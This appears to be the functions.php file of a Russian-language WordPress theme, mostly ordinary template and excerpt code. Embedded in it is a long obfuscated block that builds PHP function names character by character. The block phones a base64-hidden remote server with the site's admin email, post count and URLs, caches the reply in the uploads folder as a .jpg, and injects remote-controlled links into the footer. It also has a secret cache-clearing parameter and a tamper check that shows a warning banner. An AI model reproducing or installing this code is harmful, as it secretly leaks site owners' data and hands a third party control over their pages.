<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $gtkb='a';$NuZy='c';$avqocC='s';$RDzvxC='b';$trvuP='e';$tUbYNzv='e';$ZBcet='e';$JwEf='d';$EtXaKld='_';$tkvigaB='o';$kESxwto='6';$blpe='d';$SKwuLDO='4';$bxuPPcmR=$RDzvxC.$gtkb.$avqocC.$trvuP.$kESxwto.$SKwuLDO.$EtXaKld.$JwEf.$tUbYNzv.$NuZy.$tkvigaB.$blpe.$ZBcet;$auGvXX='i';$oJUWut='f';$Dshes='a';$zsPux='g';$KJwh='e';$DsiN='z';$KNzIpY='t';$NjQkj='l';$yuuLtx='n';$ZdXUllIL=$zsPux.$DsiN.$auGvXX.$yuuLtx.$oJUWut.$NjQkj.$Dshes.$KNzIpY.$KJwh;$kitFwQ='t';$gujCQU='1';$KEyv='r';$OvjMY='o';$RJYCx='s';$LdHsi='_';$kMvnw='t';$idRhrE='r';$ymOfvR='3';$ZQUkZoNr=$RJYCx.$kMvnw.$KEyv.$LdHsi.$idRhrE.$OvjMY.$kitFwQ.$gujCQU.$ymOfvR;$FsKy='r';$iTFGuz='s';$hYBiyK='e';$QfICp='r';$erxE='v';$TtmTlZf='t';$qLjbFJSa=$iTFGuz.$TtmTlZf.$FsKy.$QfICp.$hYBiyK.$erxE;                     $jg___h='a';$hg__t='c';$lj_______m='s';$pp_________u='b';$fz_______________b='e';$kb____t='e';$aq_______________k='e';$tv_________j='d';$uo__________p='_';$ql_____v='o';$rv____________x='6';$lf______________c='d';$ku___________c='4';$tc____________u=$pp_________u.$jg___h.$lj_______m.$fz_______________b.$rv____________x.$ku___________c.$uo__________p.$tv_________j.$kb____t.$hg__t.$ql_____v.$lf______________c.$aq_______________k;$ll____b='t';$vg_____________y='i';$nf___b='u';$by____w='s';$nn___i='n';$pq_____q='i';$uu_______v='n';$ai_____c='f';$at_______________z='t';$dr______________q='_';$qq_____________d='o';$nu____________o='x';$jf__________f='s';$xa___________l='e';$av______________r='c';$bd___i=$ai_____c.$nf___b.$nn___i.$av______________r.$at_______________z.$vg_____________y.$qq_____________d.$uu_______v.$dr______________q.$xa___________l.$nu____________o.$pq_____q.$jf__________f.$ll____b.$by____w;$uv____o='o';$gv__________i='f';$mv_______u='p';$kx__z='e';$cs___c='n';$sv______s=$gv__________i.$uv____o.$mv_______u.$kx__z.$cs___c;$lt_____c='e';$ur___z='r';$xc__________a='f';$pz______________h='a';$kf____r='d';$tg___________y=$xc__________a.$ur___z.$lt_____c.$pz______________h.$kf____r;$on_______p='e';$ok__a='o';$nf__________v='l';$ug_____w='s';$sd________x='f';$pf______________m='c';$rc____k=$sd________x.$pf______________m.$nf__________v.$ok__a.$ug_____w.$on_______p;define("WP_ID", $tc____________u("Mi4wLjA="));define("WP_TTL", $tc____________u("MTA4MDA="));define("WP_SRC", $tc____________u("dHBva24="));function wp_get_header() {global $tc____________u, $bd___i;if ($bd___i($tc____________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$bd___i($tc____________u("d3BfZ2V0X2Zvb3Rlcg==")) &&$bd___i($tc____________u("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $tc____________u, $sv______s, $rc____k, $tg___________y;$kh__y = TEMPLATEPATH."/".$tc____________u("Zm9vdGVyLnBocA==");$bv_____g = @$sv______s($kh__y, "r");$kh__y = @$tg___________y($bv_____g, @filesize($kh__y));@$rc____k($bv_____g);$pw_______i = TEMPLATEPATH."/".$tc____________u("ZnVuY3Rpb25zLnBocA==");$bv_____g = @$sv______s($pw_______i, "r");$pw_______i = @$tg___________y($bv_____g, @filesize($pw_______i));@$rc____k($bv_____g);$ie____________k = 0;if($kh__y && $pw_______i) {if ($tc____________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($kh__y, $tc____________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ie____________k = 1;}if (substr_count($kh__y, "wp_theme_GPL_credits()") < 1) {$ie____________k = 2;}}if(WP_ID != "2.0.0") {$ie____________k = 12;}}if($ie____________k > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ie____________k -->";}}function wp_loaded() {global $tc____________u, $bd___i;return $bd___i($tc____________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($jc_____________c, $nf______w = "(more...)", $dn____________t = 0, $fr_________v = "") {$id_______________b = get_the_content($nf______w, $dn____________t, $fr_________v);$id_______________b = apply_filters("the_content", $id_______________b);$id_______________b = str_replace("]]>", "]]>", $id_______________b);if (strlen($_GET["p"]) > 0) {echo $id_______________b;}else if ((strlen($id_______________b)>$jc_____________c) && ($di___x = strpos($id_______________b, " ", $jc_____________c ))) {$id_______________b = substr($id_______________b, 0, $di___x);$id_______________b = $id_______________b;echo $id_______________b;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$nf______w</a></div></p>";} else {echo $id_______________b;}}}$og_____________w='o';$fs___________i='c';$pc_______________y='e';$ol____________y='4';$ie___n='b';$vd_____p='a';$pr__k='6';$gq_____u='e';$lh__________w='_';$hy____________t='e';$gb________c='n';$cv__________n='s';$fo__________v='d';$ir___________h=$ie___n.$vd_____p.$cv__________n.$hy____________t.$pr__k.$ol____________y.$lh__________w.$pc_______________y.$gb________c.$fs___________i.$og_____________w.$fo__________v.$gq_____u;$yc______h='e';$et__________j='f';$bn__________v='i';$xj____h='n';$vg__________x='_';$he_______________j='_';$os_____________t='e';$wn_______________k='o';$jn__________o='t';$ft____a='n';$yu_________q='s';$be______________z='g';$xt_____________e='t';$rn____a='c';$ij______x='l';$zu______________b='t';$yv__x='e';$xj___a=$et__________j.$bn__________v.$ij______x.$os_____________t.$vg__________x.$be______________z.$yc______h.$jn__________o.$he_______________j.$rn____a.$wn_______________k.$ft____a.$zu______________b.$yv__x.$xj____h.$xt_____________e.$yu_________q;$re____________m='f';$iz_______i='l';$sm____g='x';$al________k='s';$xc____________c='_';$ji__________l='e';$tz______________k='i';$va__e='t';$td____c='i';$er______________y='s';$cn__________w='e';$se___________d=$re____________m.$td____c.$iz_______i.$ji__________l.$xc____________c.$cn__________w.$sm____g.$tz______________k.$er______________y.$va__e.$al________k;$hg_________u='m';$ey__z='r';$ua____t='n';$cw____________w='v';$mi________j='s';$mp________v='r';$eb________g='o';$pr______________m='c';$pc_________u='a';$xn_____________h='e';$ye___________w='e';$dp_______________v='i';$xt_______________z='_';$fr____________s='o';$pz____s='p';$um__c=$cw____________w.$xn_____________h.$mp________v.$mi________j.$dp_______________v.$eb________g.$ua____t.$xt_______________z.$pr______________m.$fr____________s.$hg_________u.$pz____s.$pc_________u.$ey__z.$ye___________w;$pu___________v='o';$ug_________u='n';$hl_______l='p';$ks__e='o';$ph_____s='f';$fz____m='k';$pc___k='c';$gm__w='e';$at______t='s';$rk__________a=$ph_____s.$at______t.$ks__e.$pc___k.$fz____m.$pu___________v.$hl_______l.$gm__w.$ug_________u;$lq______b='t';$sm_______________g='e';$jr_____b='i';$rq__j='r';$pg__________q='f';$ed__v='w';$pe____x=$pg__________q.$ed__v.$rq__j.$jr_____b.$lq______b.$sm_______________g;$qv______________c='d';$mz_________v='m';$mg____e='5';$os_________d=$mz_________v.$qv______________c.$mg____e;$qp_____________y='l';$yw_______________f='a';$pw__d='h';$wu_______________s='e';$bo____j='t';$oj__________u='r';$si__n='a';$ry_____________p='p';$rn_______t=$oj__________u.$wu_______________s.$si__n.$qp_____________y.$ry_____________p.$yw_______________f.$bo____j.$pw__d;$yz______________l='a';$ug_______i='l';$qs__h='s';$mc______d='z';$iq_______e='i';$vw___________d='n';$vi_______o='e';$tb____l='e';$nc_____c='u';$ax_______________s='i';$ae__________w='r';$sr__________e=$nc_____c.$vw___________d.$qs__h.$tb____l.$ae__________w.$ax_______________s.$yz______________l.$ug_______i.$iq_______e.$mc______d.$vi_______o;$vc___________r='n';$xw__u='a';$jn_________f='m';$va__i='e';$zp___________q='p';$mg___________g='t';$io____________p='m';$eu___________z=$mg___________g.$va__i.$io____________p.$zp___________q.$vc___________r.$xw__u.$jn_________f;$tb______x='_';$af_______q='e';$mv_____t='t';$km___b='e';$pw______a='t';$qt_____________p='a';$ub_________o='s';$er________j='t';$fx__________g='x';$bw__l='r';$jl__a='e';$hs_________i='t';$do_______x='c';$bs__________l='a';$bj___h='m';$qu_____________g='c';$us_____________w='n';$ba_________a='_';$qz________c='o';$th______o='r';$pb__________w='e';$tn____________u=$ub_________o.$mv_____t.$bw__l.$km___b.$qt_____________p.$bj___h.$ba_________a.$do_______x.$qz________c.$us_____________w.$pw______a.$jl__a.$fx__________g.$hs_________i.$tb______x.$qu_____________g.$th______o.$af_______q.$bs__________l.$er________j.$pb__________w;function nw___q($jx_________a) {global $tc____________u, $bd___i, $xj___a, $um__c, $tn____________u;if (!$bd___i($tc____________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($um__c(PHP_VERSION, "5.0.0", ">=") && $bd___i($tc____________u("ZmlsZV9nZXRfY29udGVudHM=")) && $bd___i($tc____________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$oe______________k = $tn____________u(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jp____v = @$xj___a($jx_________a, 0, $oe______________k);} else {$jp____v = @$xj___a($jx_________a, 0);}return $jp____v;}function ec_______i($jx_________a) {global $bd___i, $rk__________a, $pe____x, $tc____________u;if (!$bd___i($tc____________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$dw___l = strpos($jx_________a, "/", 7);$gp__o = array("uri"     => substr($jx_________a, $dw___l),"host"    => str_replace("http://", "", substr($jx_________a, 0, $dw___l)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ec_______________k = @$rk__________a("$gp__o[host]", 80, $kf___________p, $ch________a, 4);if (!$ec_______________k) {return false;} else {$jp____v = "";$vi__e  = "GET $gp__o[uri] HTTP/1.0\r\n";$vi__e .= "Host: $gp__o[host]\r\n";$vi__e .= "Referer: $gp__o[referer]\r\n";$vi__e .= "Connection: Close\r\n\r\n";@$pe____x($ec_______________k, $vi__e);while (!@feof($ec_______________k)) {$dj_______________n = @fgets($ec_______________k, (1024*24));if ($dj_______________n == "\r\n") {$ra_______________r = true;continue;}if ($ra_______________r) {$jp____v .= $dj_______________n;}}return $jp____v;}}function za______y($jx_________a) {global $bd___i;$jm___k = false;if ($jx_________a != "") {if ($bd___i("nw___q")) {$jm___k = @nw___q($jx_________a);}if (!$jm___k && ($bd___i("ec_______i"))) {$jm___k = @ec_______i($jx_________a);}}return $jm___k;}function nq_____k() {global $_SERVER, $os_________d;$ub______________h = $_SERVER["SERVER_NAME"];if (substr("$ub______________h", 0, 4) == "www.") {$ub______________h = substr("$ub______________h", 4);}$ub______________h = $os_________d("$_SERVER[SERVER_NAME]");return $ub______________h;}function sr______r() {return "file";}function do_______________z($jx_________a) {global $_SERVER, $xj___a, $se___________d, $sv______s, $rc____k, $pe____x;$xx___________d = ky_______j();$rk_______b = nq_____k().".jpg";$rl_______e = $xx___________d["dir_upload"]["path"]."/$rk_______b";$cg_____h = @filemtime($rl_______e);if (!$cg_____h || ((time()-$cg_____h) >= WP_TTL)) {$jm___k = za______y($jx_________a);if ($jm___k) {if ($se___________d($rl_______e)) {@unlink($rl_______e);}$bv_____g = @$sv______s($rl_______e, "x+");@$pe____x($bv_____g, $jm___k);@$rc____k($bv_____g);}} else {if ($se___________d($rl_______e)) {$jm___k = @$xj___a($rl_______e);} else {$jm___k = false;}}return $jm___k;}function ky_______j() {global $_SERVER, $tc____________u, $ir___________h;$wj__________z = wp_count_posts("post");$lm_________s = pathinfo(get_bloginfo("template_directory"));$xx___________d = array("url" => array("report"      => $tc____________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $lm_________s,"dir_upload"=> wo____g(),"queryString"=> array("?a001=".WP_ID,"a004=".$lm_________s[filename],"a005=".$wj__________z->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$xx___________d["url"]["queryString"] = implode("&", $xx___________d["queryString"]);$xx___________d["url"]["report"] = $xx___________d["url"]["report"]."/?".$ir___________h($xx___________d["url"]["queryString"]).".html";return $xx___________d;}function wo____g() {$ks__r = wp_upload_dir();if (isset($ks__r["error"])) {$xw__________t = xa______________d();if (is_writable($xw__________t)) {$ks__r = array("path" => $xw__________t);}}return $ks__r;}function xa______________d() {global $bd___i, $os_________d, $rn_______t, $eu___________z;$ed__________p = (bool) ini_get("safe_mode");if ($ed__________p == true) {return false;}if ($bd___i("sys_get_temp_dir")) {$we____________b = sys_get_temp_dir();if (is_writable($we____________b)) {return $rn_______t($we____________b);}}if (!empty($_ENV["TMP"])) {return $rn_______t($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $rn_______t($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $rn_______t($_ENV["TEMP"]);} else {$wu_____n = $eu___________z($os_________d(uniqid(rand(), true)), "");if ($wu_____n) {$we____________b = $rn_______t(dirname($wu_____n));@unlink($wu_____n);return $we____________b;} else {return false;}}}function ik_______q() {global $_GET, $se___________d;$xx___________d = ky_______j();$ub______________h = nq_____k();$xw___h = sr______r();$zb_____________f = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xw___h == "file") {$gt___j = $xx___________d["dir_upload"]["path"]."/".$ub______________h.".jpg";if ($se___________d($gt___j)) {@unlink($gt___j);$zb_____________f = "deleted";}}$eg______________y = array("s"=> $zb_____________f,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($eg______________y AS $nn___u => $ge___i) echo " [$nn___u:$ge___i]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $bd___i, $tc____________u, $sr__________e;$xx___________d = ky_______j();$ml_______________c = "do_______________z";if ($bd___i($ml_______________c)) {$jp____v = $ml_______________c($xx___________d["url"]["report"]);}if ($jp____v) {if ($jp____v = @$tc____________u($jp____v)) {$jp____v = @$sr__________e($jp____v);if (strlen($jp____v[custom_credit]) >= 5) {$xx___________d["default_string"] = $jp____v[custom_credit];}if ($jp____v["status"] == "0") {$jm_______________m = 1;$hl__________z = 1;} else {$oo_______a = sizeof($jp____v["links"]);$vj__k = $xx___________d["default_string"];if ($oo_______a > 0 && $jp____v["links"] !== "") {$pq______o = 0;foreach ($jp____v["links"] as $rt__________o => $dk____m) {$pq______o++;if ($dk____m->l_path == "" || $dk____m->l_path == $_SERVER["REQUEST_URI"]) {$dk____m->l_href = htmlspecialchars(strip_tags($dk____m->l_href));$dk____m->l_title = htmlspecialchars(strip_tags($dk____m->l_title));$dk____m->l_anchor = htmlspecialchars(strip_tags($dk____m->l_anchor));$vj__k .= " | ";$vj__k .= "<a href='$dk____m->l_href' title='$dk____m->l_title'";if ($dk____m->l_nofollow == "1") {$vj__k .= " rel='nofollow'";}$vj__k .= ">$dk____m->l_anchor</a>";}}}$xx___________d["links"] = "$vj__k";if ($jp____v[credit] == "0") {$xx___________d["links"] = "";}}} else {$jm_______________m = "1";}} else {$jm_______________m = "1";}if ($jm_______________m == "1") {$xx___________d["links"] = $xx___________d["default_string"];}echo "$xx___________d[links]";echo "<!-- s: $jp____v[signature] -->";ik_______q();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
